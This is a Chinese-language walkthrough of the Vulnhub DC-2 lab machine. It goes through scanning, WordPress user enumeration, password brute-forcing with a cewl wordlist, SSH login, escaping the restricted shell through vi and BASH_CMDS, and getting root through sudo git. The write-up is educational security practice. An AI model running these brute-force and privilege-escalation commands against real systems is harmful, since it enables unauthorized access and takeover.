Vulnhub系列：DC-2

Vulnhub系列：DC-2

靶机下载

一、信息收集

nmap扫描存活，根据mac地址寻找IP

nmap扫描端口，开启端口：80、7744

访问80端口发现无法访问，存在跳转，修改hosts文件

C:\Windows\System32\drivers\etc\hosts

最后一行添加

192.168.23.142 dc-2

再次访问

dirsearch目录扫描

页面查看wappalyzer插件发现

wordpress框架
php语言
debian操作系统
mysql数据库

首页flag

拼接目录发现以下页面

kali使用wpscan工具扫描插件漏洞

wpscan --url http://dc-2 --enumerate vp

使用msfconsole尝试利用漏洞

use auxiliary/scanner/http/wordpress_ghost_scanner

查看配置

options

设置RHOSTS

set RHOSTS http://dc-2

run开始攻击，没有效果

kali使用wpscan工具，扫描出三个用户

wpscan --url http://dc-2 --enumerate u

admin、jerry、tom

尝试爆破密码，没爆破出来，看了下大佬的文章，用cewl工具爬取了可能存在的密码字典

cewl http://dc-2 -w passwd.txt

查看字典

用这个字典爆破密码试试

wpscan --url http://dc-2 -e u --passwords /home/kali/Desktop/passwd.txt

爆破出了jerry和tom的密码，admin没爆破出来

jerry / adipiscing
tom / parturient

登录

前面功能点看了看没什么东西，文件也无法上传，在pages中发现了flag2

这里提示从其他入口进入，端口扫描时有一个ssh端口7744

二、getshell

连接ssh

ssh jerry@192.168.23.142 -p 7744

jerry账号连接不到，换tom账号

ssh tom@192.168.23.142 -p 7744

成功连接

三、提权

执行命令发现很多命令无法执行

查看可执行命令

compgen -c

发现vi命令可以执行

vi flag3.txt

提示提权后再看jerry和su

vi flag3.txt

输入

:set shell=/bin/bash
:shell

部分权限提升，返回上级目录，发现jerry，进入目录发现flag4

vi查看

vi flag4

说没有提示，但是最后一句git outta here，应该在提示使用git，但是sudo -l无法查看，不确定

绕过rbash，切到jerry

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量

查看当前权限

sudo -l

git拥有root权限，执行命令，提权成功

sudo git -p help config
!/bin/sh

切到root家目录，查看最后一个flag文件